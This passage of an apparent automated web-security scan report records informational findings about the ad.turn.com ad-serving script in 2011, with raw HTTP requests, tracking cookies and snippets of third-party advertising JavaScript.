Set-Cookie: pf=7pNlsHjVuT3tXtZIW2s_8vUhGJJ_QBvo2s4YEjd1GzAIHKIn0aMUCJnjty0nF6sdbclOGXPRI-4VrzHDg2TW0LJCb1cJxT_kwexUav9kEuHB8rw3HCsM6f9IpOSiQTFvJRKRbaQOui20s_9Bg4OdTngvxbAnhJ28PXFGVB1HyKBzy9fyoK7Wm9GhDtN3JSpoDSdgzvPz5efu6QjaGKhI5UwRUPHDfEOV3_7TnliI6U0x0lAZcaUvKKJ1QHmD_0YTw3USs_Efch8DyLQMqjj6C38-1lKIfX8YIpHRO4p--bGdMJBPDfs0jkNOV4KIC2xDdyNCEwJ23wuLt_MXDO1Z_IPhKl9BwPkNTah2lgQhjENI6H6e7r5GTuDHDKVwuDsSEg7X7QYS6UmUwbg2ikGtI0G3AaAZcVYD2Nt2uXf8ZtPeW6pgENIG8_w3xeZd6kK1sMs6I0SNDLzqnN7H1gbxbZdD0DY_lKb855iyP7fClP5XxONep4hNPzsxAJRJ1kou-ViOtsrp_bf27P9c5lUTyCQKcdzHjBck_b_B-UHMhYH6KLrjh5PX3m_XxZw53g56CxLowAXMELECGkbRM_oCpxhBhsTZW3iX4HdrzgpwAaQUck2p3bpVoUvhSSLXPCI9YtE-kyi_nTaX0IVqR-yakQI0mYYAhFFECfCHCg2SRYxq0S6M5I00QXLWYk2q3FJRFAkPpRwM27uiAj3Z4Fb61SVxTnK9m8UT7c0aPfZXb45oPleeGy8UXPpw6YYtnkYd_D_l2IAslLLyavszHjZBPa2iUWFiyom5hkFnxOuMWDkxYJXvwfLfmqZkXT0JHDrVc4TY00edyWQMXDx77_42FDNx_pd_cAxTF40mk5v5pYwWwImtJiseNAMcdxLAMVqLXSN0ML_WxcCtQ1Ci02yJaWGlL3V4Ng9ZefLRufU4NIErvMs-foQv1s-THrPJvkSFf_RbvZfjFZEbm5rhYFYobJEeNFTJ5qhmGU_V9TSYPraYX96uGtM_3pFVOdw-9XnKnQJPf1j2ATP8fxtG9wtsxg; Domain=.turn.com; Expires=Fri, 21-Oct-2011 15:30:19 GMT; Path=/
Content-Type: text/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 24 Apr 2011 15:30:18 GMT
Content-Length: 10108


var detect = navigator.userAgent.toLowerCase();

function checkIt(string) {
   return detect.indexOf(string) >= 0;
}

var naturalImages = new Array;

naturalImageOnLoad = function() {
   if (this.width
...[SNIP]...
</div>\n            \n                <img border="0" src="http://bs.serving-sys.com/BurstingPipe/adServer.bs?cn=tf&c=19&mc=imp&pli=2442546&PluID=0&ord=&ord=3226986560327928345&rtu=-1">\n                \n        \n    \n        \n    \n                    \n                    \n\n\n\n\n                        <iframe name="turn_sync_frame" width="0" height="0" frameborder="0" src="http://cdn.turn.com/server/ddc.htm?uid=2931142961646634775&mktid=1&mpid=104198
...[SNIP]...

23.49. http://ad.turn.com/server/ads.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.turn.com
Path:   /server/ads.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /server/ads.js?pub=5622371&cch=5689307&code=5689665&l=728x90&aid=25818769&ahcid=986337&bimpd=fvqWk9E7aKARqlPGoosJXpdA8tM0WuoTZOFWbt8juMrkbYeyOJZYseXQhJl-D8dZ1W8j3AWyyRt_S4xWx1Wocq9niBJoz6621irB3f190hVoi5oxQPyCItoVSlkU2GiEKa7xi-Yh-L5zIgjO7n9XM9W-SvPVZ9uvWN6QKCcGWsFt1AnXVvRUHCS3x0AwhdfJrH0SK8FW6VcT2pkB7RfPtoc5ouwqR_rUxEmpjLbn_kGIlmyImarU-piwr0Jt0WhoGLqsZmaJeMzvP2wO9dmfzLdujv620HmwyC87B22XsEDnjvFkbfDhOTBqKi71LuQkPN61H_pRF_QxxnLkwBnFkRrRdyRa2Vn_6BjzH-FFxuCiWvQM-mTsg-ZlkzhHNNwTCcJzEb1qj5xmeir2G5gfeX3im_YGwEoKshG4ob_yn457bS2HEfMO6qa0Gwjcoyk4eB3x2ve04_d-saB0rPeqGTn1FAv89x4axE5Jcvz3NtGNXHmwdmZPdbayfYow3TS_pRffsD1QMAPrsB9Edfeqxoyc-pC_2W_bc6ewxhFwGvHUoPaaHnaoorULvxTzi44m1_Si-euS0zvZ4Sy6x3y4oBWPJSpYQc9hMA6Upo39y-px8dz54g50gXlKFn0w_61FWrucAA4n2-3CMAbQ96XgsdMp68CY-i0F0mEcU4d3dpJcURMhRM2LhpW-3_PATP0lCcTuEpgm1oB6Mt98YrnVmAXvL6koORN8ahDMn98RAsmwrRTD9o2SJxjqGPytYYwfCTWuOI6iK62k4xtoN-1-5A&acp=TbRAZAAC2tsK5XbqIPpc8lxQHpbwNolfLMpt4g&3c=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBipcRZEC0Tdu1C-rtlQfyuemHAsCshNAB-KLb8wyIx7WKGQAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi02ODg4MDY1NjY4MjkyNjM4oAGM97n0A7IBF3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0ugEJNzI4eDkwX2FzyAEJ2gFIaHR0cDovL3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0L2Jhbm5lcl83MjhfOTBfYi5waHA_c2VhcmNoPSU3QiRrZXl3b3JkJTdEmAJkwAIEyALsk-kJqAMB6AO8AegDlAL1AwAAAMSABuHh9obM1uH8Ww%26num%3D1%26sig%3DAGiWqtyMckh3wZa7xNgeCD_9yTTL6zDYkw%26client%3Dca-pub-6888065668292638%26adurl%3D HTTP/1.1
Host: ad.turn.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=90&slotname=9524956792&w=728&lmt=1303676599&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_728_90_b.php%3Fsearch%3D%7B%24keyword%7D&dt=1303658599151&bpp=5&shv=r20110420&jsv=r20110415&correlator=1303658599159&frm=1&adk=513358139&ga_vid=955713783.1303658599&ga_sid=1303658599&ga_hid=1255304632&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3961147505&fu=4&ifi=1&dtd=11
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=2931142961646634775; adImpCount=ccLvK9U7QtRdQShOfq29UyRA0hWOzjunjXltn4Ro0wLfaqaDzVRu9ZiuBStYaftY77DtXuOsguLFXai3AhFvnPZsdOWLg55db-rGyslK6Hn4Gsu4bgzX3HPXF8aZ-svzaHqjEn6Y89hUb1ebcReTqO0G0mfFUdQh0TS12QC5rdd0SKdPzhEKaKWeI5Yx2N7aA81RFV7Ju3REEBkpNZET3_AH03m22f6LSucPu24XFtbJoH4cOuvYUlTkCNcoKzYAk3NUPm8pwlGf5Ch1PutwrWnSvjM6YIyaPo076xrJcUNwbiSZqdEKL6qcppfxujGOl00l94DPr57wWUBTyRbAx6SFM-Ia8iW6v4r--R4cQ0vlVHWJOdM_ZTcKgFSOlW-v76c4pTy1x4tO_Sj_92V_c9l9yJcRs-_HV2FNNdqgmWKwzOueNcvo-1XmGz_MBiuXyjJSUibZ2BHh2T3FSfjGAITyiawrkOih_FdqW5ZHwRtMNQF2iyMUjVL7ttzR-BfUzv-eZrtlUUUI4c_78m_3_c5cySrnTOh9dMxUw7WE-ja_3nZQmNNcCcp3_wtIWynWBXJ7BVYb5SQq17PzxVE1C6477_djhhS3SPkBUOiwXvN2UB-mbqJWj3F9DmOa47ugri-pvt5MhqWaQjjpMBxrbP88WWl0G0-IGYzqbaILcNa3VMZDZgEWVs3Qz2BttiQfQ912etMxHez7HFbRYJQYust_BLX_n2e0dL-0aj8mixtcWuh9OwP5WPMPXscRpCIMFJd1V6hK_6XZdSXRi1-9fBCyOg31PpLP2jtWuqGVpHCpDjfslrVyDxMBDlIppEJHn4tBFuPx-iDBchd3Xj-d6mnSvjM6YIyaPo076xrJcUPFlP5zO97faJzZ1aEtSW6dEc4daKu1RR2_0SqsSvHV96fpCL8Eb_AKATM_EJjD9j33kP4Nrko0okcXRXUghtRr76c4pTy1x4tO_Sj_92V_cwkPlA1bugHQgsNwNUN2EW3vp6h1m4YoN9gfv5UHXFQ2IC2DhdDGl4eOo_AeA0QhrRR8ZQb2LnR0fR8FdQf63bxMNQF2iyMUjVL7ttzR-BfUCSUxGKV05l1cGmXYc-J8685cySrnTOh9dMxUw7WE-jawGQoklAJzdveKdvZB8xorXil4TWqZs2Fc7APxLqKkAa477_djhhS3SPkBUOiwXvP23sgE4QizgtxzDeUH6ed8ri-pvt5MhqWaQjjpMBxrbGAV0u7jnu-eT7fscIjrTHjekC0SQGeXG_xb5T35Ss4efvOlTreFo8nIhLOXDY0psSnAQFqLbCQVMKL0SHYQuupcWuh9OwP5WPMPXscRpCIME_H2_mgzLFa4hlL8c6saRH0j2kee9z_x-ARl44ojjAapDjfslrVyDxMBDlIppEJHAtEJaHH6FiwpVk1TbTCs4Pz02zxgwih1t32hJDzR2iRXwQ3_DbEzpjmCmVHD87QzadK-MzpgjJo-jTvrGslxQwHGaeF-WAjW7mJndH2YOVwnmSpuC_J3YHxfjAKmX_B04URqqaHNzgB7E6-VsRza8HA3VcuutiZOC52FKO3yoHzvpzilPLXHi079KP_3ZX9zjadLD_W4Qk25QaIl2BiwNWYjiJWk9aQzyVLZH2OXmNbKV1B7NBMN8fr3nrJxtWo7FLj2bFHEeYmREZSg8ADBFkw1AXaLIxSNUvu23NH4F9SkzNOjGWKQGeKTtJ4HtrvVzlzJKudM6H10zFTDtYT6NqjNrOxeF8jsNeArRzd1s-x6ni1qbTBwW4MUEN1JdpM3rjvv92OGFLdI-QFQ6LBe87RxY6maGdv72eHuIFUDWKyuL6m-3kyGpZpCOOkwHGtsTJv5rtLhQ6dRr4jL8-o8Q68bcUqbFMpI-C-npTlLMx1SiOGlfTWtXL36ePiOy9aUQjiE1VNrAoqhhI_BVRY4D1xa6H07A_lY8w9exxGkIgzb_uapo_3GEjtQiNCUDA8sLPlqlRXWjl7eyI_CFu0hP2ckgCGSuiZNCnk1aHQCYkCgXmHzsmMRGgA0PrWVAGQ9adK-MzpgjJo-jTvrGslxQ7m6MVSNRUpqQ2D-10cypClv9BiYngppqZAgOJPk3JR32_hjlieDEGkxFdag2l_Aoc92R9o7AwpEl_z76FPzBpnvpzilPLXHi079KP_3ZX9zDTgBGp5IRkjrCAJTV8ZVAh1hJ3Lx2jTH6Z2vbSJvJVj_wcYOmG1ekAJmxsrcnmB-BBip3t4loip6gpJE7PRXhUw1AXaLIxSNUvu23NH4F9RPZZPOeGksgK52Qk4Yl60ozlzJKudM6H10zFTDtYT6NjElSgtlUCOcJy3pQW5jN33Kfmv5vVtdGhz4fVjqsFSY2Q24GDIb9Ig_sE3JF_KtqXxT5SmcZWzceN7XXcpz3Laj1iqJAw0pRiPxGBAqA2RguFxSuIusHqs-ANeRqI2eX0-W1jQPyJ9G5swrvmSFjnv5CByYP35e21Aw1IYnm6BihTKE7NZh8XhewTjqO8PhyAWwnurw8UZTM80oyuw1nZlP-zJhZZ-Q1bjRitacbaxOVTP9qcmAVf1O57ebp5SQNZSGXGpVGHhUYdpuUFiTjAlIA6qqP3BKO_N7QLYJ3-V2JF1diQSQ1nvXkYY9WDOjGVCWFcKk0OcK1paod2fc3z9PTR76F7aRbqUZNhA6AnczEot1eKTaALu3bxsky_SF7xrqIY4uIILMFgOWc-MUVQGUh5NYki1nFLjbBW-SMmWII58FWMHxHN9h4DqRCViFvMbXDpwiPTREhuOK4UpMWBgaaKd8aPfSclggHpvcnj1rTQa547WaZ7vej-BKaHXRnSiWKGazF07-sb9WbMJcB69Uzu4XKtxm-arTbtpAldmp8flrd8Pliv5vI_mjE9mWMY8KwsEwgd20k5ELAKwe3k279Aus6b5L4_NZc9G2gsPjvykZyrZ0lJbepgbY9J6LUbR3eEBbRxGTiyMX7kM5_NYwE2eVqCLcXBoZRYALyknr3LMopBM3AO5sKxGXe66Xcf1bUBS5gLuXGklliOTAkJuZ294oTg07S25wzyY5hqce37GgssTXYn2Xq8BZZgg2HObpk1xG3bToP3rXxzkj99ob5G0iiG2c_fr_eXLG84IsFvl6CwW7WMzXN4Hy5VoXWdaDuBsa5-28Mf8id0a4QFFD8ZqHLAvGnCoQ5AOuBKm4L9PTq1WYbcqAhEgQ83H5jMT6_nHF-Y8EU68DntCrjSQhIAIJkqhLZq2eZKjN4-l1K9pctvwsmq0JVN5pjnr7Cfg7jEMAhNszr5vuhm7M1ncvWgg4Yu1PCxkrNZyc-7VV-X_mx9F_7A7hdJLrSJaQwEjFn7eCNBMEz5wEn4z2HwUeSE9GcePbxvwdOT2mw813dZLTgxswKbPWb5-ti9vvM3TUADBPX2cC3KvSE-hYOcql6PYaa2Yof4H8ZbNEXKfxVWD_EqNwcSG3SB7DIjAFUePeH61RVAavNz6UfSwJ9-LZSLv5mnE5HrFnrMAJuA2Ehz39nqEfupWDpbXsEB9HKrCY6EDv-NGLxdTyLmLO0Agh-ExB6IF4sY8Tq5KqaEWYITXkUKx3KsUe2Po5SVOIqioXp52XStQPhMwXyt2Ad5s; fc=kZobV0mv2OChfkn6NxQs5IZGf83ZoUpCw_-LIwCF6JKXj2VWkQs_pZe2x4BlBj3dlN1QdeW4zlTZ3FmFjhpKQWfGrPx0K-SOL3w7moPxVd8PpZsczLZg-X3ewhfnbE_kaq3VcZ9RZeFJ5DmVciVRNT-17uf2fQ8lD0LtIx6_Iq4; pf=NorDLowqwpEErYS1IRlXOCfhHOczs2r3pVTqk5-dp_aS04H7stKnZdMqlx3yK2bUcy-iZ5wUC35PPQSMEVdkipxKMUvxbd3f4Da9CFOTnTLWCQKR_r6qY54lFjJbA4MKo2PgnaN3rNEZPcj1JP_yFl3OnJaEawY-HzaiUFPHnzHCJURYTll9YSZFjFvcZECT7ANZN-zFyB3LaaiNSQAne-eUjAeuFexCQpSIGGE-hCu26aZc5sDc4UJmeMYA4wA4zO05pHI-TuL2Zs_aTFBxV5zGyX9gCVIJL41fXCewMtGIOTObyhw6XI9NsuIQ3LHMPwDuZeCTmjbOJ12_tYZY7qYaNMhlV9JYPNAa9WJ26feij1a04Z4aJbTbeEF7HREPS4iF2IFkJR-IDjmCPDngrg; rrs=1%7C2%7C3%7C4%7Cundefined%7C6%7C7%7Cundefined%7C9%7C1001%7C1002%7C1003%7C10%7C1004%7Cundefined%7C12; rds=15082%7C15082%7C15082%7C15088%7Cundefined%7C15082%7C15082%7Cundefined%7C15082%7C15082%7C15085%7C15085%7C15082%7C15085%7Cundefined%7C15085; rv=1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: public
Cache-Control: max-age=172800
Cache-Control: must-revalidate
Expires: Tue, 26 Apr 2011 15:23:17 GMT
Set-Cookie: uid=2931142961646634775; Domain=.turn.com; Expires=Fri, 21-Oct-2011 15:23:17 GMT; Path=/
Set-Cookie: bp=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: bd=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: adImpCount=IOm-9eUfzJE5t64hRDIt0zc_YOOYoH5iAoJDp0qhYG-Y481wEkFtGX7HudJA1SwJ77DtXuOsguLFXai3AhFvnPZsdOWLg55db-rGyslK6Hn4Gsu4bgzX3HPXF8aZ-svzaHqjEn6Y89hUb1ebcReTqO0G0mfFUdQh0TS12QC5rdd_NeHpirdcMFfI8fO5dnT_PLrZwiRGgyh_MJR-M-ApSJyckovI9VBGSzpZfR8FHPdSSO3kAipW9Q9kWLZ-MJl_BrftuWyTDvwUtbSpm9eZvGnSvjM6YIyaPo076xrJcUO8BVXP0P0kDQBcxYVqJq4WnUL9zFp76gzRF15RP8Q9KIyZ74aPux2C99RMycWzdi7GLYP54sbK8T8cZhoeBWYu76c4pTy1x4tO_Sj_92V_c9yNIOBYB9A2wOEs8WKRPUcOtA-yYJHFrReS8rj8aZLb39uQ1iPta8Wrn8c58UAYuso-Mc3i4V4Q0Y9NWCrnbQJMNQF2iyMUjVL7ttzR-BfUbHKSnkYu9iMX4qj0tqHHks5cySrnTOh9dMxUw7WE-jbOz16PuTPjhPfxJX8Ty59Sj7f8ibFTFhojQbBB5-JlSq477_djhhS3SPkBUOiwXvOi5Fgu10En2_NiR79s1111ri-pvt5MhqWaQjjpMBxrbLFKZnmTCPh4wDgOEmr_jJxHE0nhTFNONjqHgUYm4FpRfvOlTreFo8nIhLOXDY0psZuqfgOi4oylyQlDcE1kSHJcWuh9OwP5WPMPXscRpCIMCnCxyGugHBE9FTQ_IvAvZIN9Q_fjvM40K0xc0YEcl4L89Ns8YMIodbd9oSQ80dok4XSyCFv6qiNgfItGth8yYGnSvjM6YIyaPo076xrJcUNhggDeUdfGoPZJlKeW4R1HEc4daKu1RR2_0SqsSvHV93nRLZ7BQJ3BesUmQ_jjYmjVSEyKGxHSEDBnY-SbN8VG76c4pTy1x4tO_Sj_92V_c3sy_af5K1wDa53eNzFiV73vp6h1m4YoN9gfv5UHXFQ2EokABglYvcvHxrKLhk0Oa_Km3kT-DB1pnpY41igpyJxMNQF2iyMUjVL7ttzR-BfUlxiurrQNK1NDp-4mMBHEuc5cySrnTOh9dMxUw7WE-jbWH4kVY90906vEqljUXjN51Jt0mGvCxzEQwCiVbU9JMq477_djhhS3SPkBUOiwXvNZ5qXshwvYwx79p4ngj3vtri-pvt5MhqWaQjjpMBxrbO3BokNWkTLwjj2gCtgf5Qhl2YOxdQQWgOxtDIlnQE-ofvOlTreFo8nIhLOXDY0psUlTnGLNnnydFejHnHxno5JcWuh9OwP5WPMPXscRpCIMXQlyEV2-I3IIzy91bwO_d9EJo3mm3QAFgWCzMlsJM2789Ns8YMIodbd9oSQ80dokkKUxJ75kJBDo9prd088xC1yzr7JSNK1C6Wfrc4PoBe7PQexZTwznXHLToARBEFWiadK-MzpgjJo-jTvrGslxQxMOSg_OH8TApjcKQRDrCNo_fKO0O6rQrNBeK1ac1kY-R5cTHDVI8fjybjRvjybj510L1lHuYF9vOfs3PRLc9kbvpzilPLXHi079KP_3ZX9zZRVXQGO8fW7t8V-mYdCaHNEq30AVPVAGoRKur0pKj4xDrZjSDW0d6Ge5h2FkoPIancXXoaEoJE3Hc2DB_YXf8kw1AXaLIxSNUvu23NH4F9S_CGxtVF2UhIqHPNqrCcBYzlzJKudM6H10zFTDtYT6Nv-v4sX3PfZzMJc61lkh2-hBzDtWEUaNjGqsIqgzYdZZrjvv92OGFLdI-QFQ6LBe85R3vMoYhkXhWy5J91UXk-OuL6m-3kyGpZpCOOkwHGtsCD6mq_S30vkfPB6K8A_ZRfdaBCNZWyJXoWnm04UEXix-86VOt4WjyciEs5cNjSmxxPvN6RLPLO1p4lQ5lrgMzFxa6H07A_lY8w9exxGkIgxt0vsiobF6ODkmglJ7mWGMPTKgqOHGcDR_Emj6qnilT1JI7eQCKlb1D2RYtn4wmX8JnT_77eO3YOrJ4Sg6Z4khadK-MzpgjJo-jTvrGslxQ6fi7HczpIMBvCBfMsrwX6pv9BiYngppqZAgOJPk3JR39idVXIu3f3Btwc7IzjVzjy2rMvBfZvNr-p9IKhzMtG_vpzilPLXHi079KP_3ZX9zXb6Tz5WewXZbgAbPJA1Kjx1hJ3Lx2jTH6Z2vbSJvJVgmvJ__nR9G2kz2nFBjBqYhxmY5WhWxlfSu5D7TjXyp5Ew1AXaLIxSNUvu23NH4F9SRsHGj-wraaDOVo-NnY8Z4bGjtD6F1vlAvbNz2LW0-XKY7_lT1bl78jcEnJ5WkDxaCFrKFt2PqJqf5DVukUoXlIHbOBASPSx_aSP-y9lN0xDYq3g0SjnCHIdwFIgaPN2GjM2E94Xjq_zRsOz19_sukeQe8KkXlnoIS6MkKzv5MhJ-zCwLajI_fAi7yzInpUPfqRl9A2iCBQ4QmbLn8QybuN97-yRVKiOkq451CVtrK-L_B9P-PLsJaA2q91YwrJSsVjkSgci3DslhbhLAHtk-5yNmlzVaY-ux4ldMmn95-Mr2ngwrG9CjJIipUiIWpKw0p87U_E8RCtd37Q5K62pPbYE3fjGnapFf2sSY7pRQig4QkcT5omhxvFxaDBZv8HsDc7oWxx3lMWh66OLM4EbN-7gsqGSEylLNa_SWJb-nVLwCV0QM7hreP48O_HKFKVj-fDyYACmr51dWIG_2mo97mPu8Iaf_kTsqgk7ugXpuyF50sVuvaLjQZQB-z3BRWjAOi3ckepqtCIQvo_oG8eMg83LsUjEPrRcsES3aoJiQUJTHUYLYRhoyzRad2pnwkOXjJjGluiggZfpQC0_zBkEv-v_j1kf0lu_F76LshZ13njOq9AcoC0Ui5m2rwOSIdaFvHPrlj9faHB4xTE0H4ycU-Far0EQ9jI2dgmB77e0oaHmNisOYCeGi33B_vta6JSr3j6o1UpD0LBlPnfb4q3Dmtj6bGXbZIhpmPDYJ3mAwabzJVvtmA9XADUGeSzCUmHsqeVvKRG6bTklSz_s9jHGHsU5_u3GxZteiyVHpNKhDzL7vQ0mJRuzfPJxh9dK_7uFehBzO10MqyMuK8xC49hxun-96l9nCAyeIF8XErkhGdpskxfTLV8EIwWVQ2uHZJLUSdGm0TeMLOBK0QhS-o5a2xyahlNh3iZjtdsIooTjsgAVMIgXUnyIDF5CqCarUh49S01Mh8PTu4y-hqompR6VWaJIG7SFeGTv62fgtjg1I8JQTrvXTA5V0FO00TmOhQnOjFd2gRw98MdY27_C75SQT3F4_WO7NWBkt0qQueOBvF3XTM0Qj0i6d6Ne-SMo9ZRW34nL2E8dfUI4qK_3hTt65_O1ilUO_qIHp6Muzc_la1U_2OjiAOU7PEbuWm84pe5TEp0-dwH4uGF_DEF6HvhgoubqHZESmqy0_uUoo7aAuONZ3XbPI2lPBO0ew9_baQ3iGFyTbNllGW2-6SPL-Yz_5v0XPkSOvI7kYSdc19CnoSeevm6OsBW-cQfSWP67IsCnN3J3RK7HJ47DOwUgikkAA7HAeaX_6Zr-t3T_LQ2J_VLuAlmfHhZv8RdvHYfz6uVtWY4Zb1B-5Vx0eIvlVDYxBk; Domain=.turn.com; Expires=Fri, 21-Oct-2011 15:23:17 GMT; Path=/
Set-Cookie: fc=FYu9a2gKbdfaoEP6zzAEbTULe5uzocfVf8GeQRlhtGzifjwXXf-M0jf6P6DTaEkggmUcePzA9deCmnu56kGfo3G9nFGYIVw5iLaHzkGYEwm4HlP0fRkaM5HlzXZ0g2VP9BoIXaOAeDVXRsLRbsFkfKtr4MnGGfFMDcCsCfLKkyPojEuHv26X9eomoEX8ElP2; Domain=.turn.com; Expires=Fri, 21-Oct-2011 15:23:17 GMT; Path=/
Set-Cookie: pf=_1vlf3coaTRSlfnRn2BWvmKCqkXYWBqc-E6-ZlkCbgGS04H7stKnZdMqlx3yK2bUZZ6eDl_tJYtkuIVW7eskVZxKMUvxbd3f4Da9CFOTnTLWCQKR_r6qY54lFjJbA4MKo2PgnaN3rNEZPcj1JP_yFl3OnJaEawY-HzaiUFPHnzHCJURYTll9YSZFjFvcZECT7ANZN-zFyB3LaaiNSQAne-eUjAeuFexCQpSIGGE-hCu26aZc5sDc4UJmeMYA4wA4zO05pHI-TuL2Zs_aTFBxV5zGyX9gCVIJL41fXCewMtGIOTObyhw6XI9NsuIQ3LHMPwDuZeCTmjbOJ12_tYZY7qYaNMhlV9JYPNAa9WJ26feij1a04Z4aJbTbeEF7HREPS4iF2IFkJR-IDjmCPDngrg; Domain=.turn.com; Expires=Fri, 21-Oct-2011 15:23:17 GMT; Path=/
Content-Type: text/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 24 Apr 2011 15:23:16 GMT
Content-Length: 10877


var detect = navigator.userAgent.toLowerCase();

function checkIt(string) {
   return detect.indexOf(string) >= 0;
}

var naturalImages = new Array;

naturalImageOnLoad = function() {
   if (this.width
...[SNIP]...
oncept.util.getRequestParameter;var FlashObject=deconcept.SWFObject;var SWFObject=deconcept.SWFObject;


document.write('\n\n\n    \n\n     \n    \n        \n        \n    \n\n\n\n\n\n\n        \n        \n        \n                \n                \n            \n                \n                <IFRAME SRC="http://ad.doubleclick.net/adi/N6648.150834.TURN/B5275279.6;sz=728x90;ord=3204984562765078005?;click=http://r.turn.com/r/tpclick/id/9R05pnpkeiwPdg4A_gEBAA/3c/http%3A%2F%2Fgoogleads.g.doubleclick.net%2Faclk%3Fsa%3Dl%26ai%3DBipcRZEC0Tdu1C-rtlQfyuemHAsCshNAB-KLb8wyIx7WKGQAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi02ODg4MDY1NjY4MjkyNjM4oAGM97n0A7IBF3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0ugEJNzI4eDkwX2FzyAEJ2gFIaHR0cDovL3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0L2Jhbm5lcl83MjhfOTBfYi5waHA_c2VhcmNoPSU3QiRrZXl3b3JkJTdEmAJkwAIEyALsk-kJqAMB6AO8AegDlAL1AwAAAMSABuHh9obM1uH8Ww%26num%3D1%26sig%3DAGiWqtyMckh3wZa7xNgeCD_9yTTL6zDYkw%26client%3Dca-pub-6888065668292638%26adurl%3D/url/;" WIDTH=728 HEIGHT=90 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=\'#000000\'>\n<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N6648.150834.TURN/B5275279.6;abr=!ie;sz=728x90;ord=3204984562765078005?;click=http://r.turn.com/r/tpclick/id/9R05pnpkeiwPdg4A_gEBAA/3c/http%3A%2F%2Fgoogleads.g.doubleclick.net%2Faclk%3Fsa%3Dl%26ai%3DBipcRZEC0Tdu1C-rtlQfyuemHAsCshNAB-KLb8wyIx7WKGQAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi02ODg4MDY1NjY4MjkyNjM4oAGM97n0A7IBF3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0ugEJNzI4eDkwX2FzyAEJ2gFIaHR0cDovL3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0L2Jhbm5lcl83MjhfOTBfYi5waHA_c2VhcmNoPSU3QiRrZXl3b3JkJTdEmAJkwAIEyALsk-kJqAMB6AO8AegDlAL1AwAAAMSABuHh9obM1uH8Ww%26num%3D1%26sig%3DAGiWqtyMckh3wZa7xNgeCD_9yTTL6zDYkw%26client%3Dca-pub-6888065668292638%26adurl%3D/url/;">\n</SCRIPT>
...[SNIP]...
AGiWqtyMckh3wZa7xNgeCD_9yTTL6zDYkw%26client%3Dca-pub-6888065668292638%26adurl%3D/url/http://ad.doubleclick.net/jump/N6648.150834.TURN/B5275279.6;abr=!ie4;abr=!ie5;sz=728x90;ord=3204984562765078005?">\n<IMG SRC="http://ad.doubleclick.net/ad/N6648.150834.TURN/B5275279.6;abr=!ie4;abr=!ie5;sz=728x90;ord=3204984562765078005?" BORDER=0 WIDTH=728 HEIGHT=90 ALT="Advertisement"></A>
...[SNIP]...

23.50. http://ad.turn.com/server/ads.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.turn.com
Path:   /server/ads.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /server/ads.js?pub=5622371&cch=5689307&code=5689677&l=160x600&aid=25805860&ahcid=973433&bimpd=KcL-dYVrd1LHDnQorXWd06JuB3ZsWJanuRCeZ79ASSwwZDmrtwDCMVQgQ9kqp0OM2DM-fY4Y1621GbWJDt0Ylq9niBJoz6621irB3f190hXQBbsq7GRkM0K-RGUzu2oktl1sL4zS-2XTqCiC_CemeNW-SvPVZ9uvWN6QKCcGWsGWw_XUAnRIc08sAhMi6jaM3UfbSMqNBzxuuOzvFqY6BKRgeMWOxnhllrTwR4fSEloqXHg5ybSqorAUuT7WodTias5odc_fN8lrM1sP_YEU8L8QXAnSoShrDHVAIaX5P2UXYkMwDMhThyDTSkJz17--1yYfUx0aSWjU5rLek88zmFr8VI-VhbAS9dWBM1kZBJwYfsAjue5PSL-h0Ho2t7SEPQ132Ppbuk7ijoUndfzz7rjO3SD4VdqcfcG-eEfpQLVpn1pX92TXvJ5-KusSxbhSpzPMafoj1ZGi5kyWVEWKxwaJQmyFM1l4x-S8oOkTR0VUULXw7tpNDsCXeX5kiU7IRxgM2aC6JuWrx_7_5RQ2-Q4-qt8dRxfRrYf9CqeMIgg4DbfNAl_25G-CXhfHV44tX91mNtx9s8FQapZIbkQ1tO176w3mh_t7mVXDw8Rxd3iNpimYF7PyrXxKau66bMUFxM9Cpxmh6ci9ZEp0Ip-5iiZvJnZAWhwjW9SAf1pZAjbt_T370WDWWY1SqEwEJwbh74bkML2wXdcAojXeE04DSM7CYAs_o3XcXMAh-wjz3-xA9y0FUzpqtDC0K6uSmpOa-_o7WETpsTIqibm6vBqblKo408BxR9uazB8jKSDnLvk&acp=TbRAjwANFgwK5TqKJzYiJ-pjsjysanZM1w5mcw&3c=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBN9_Aj0C0TYysNI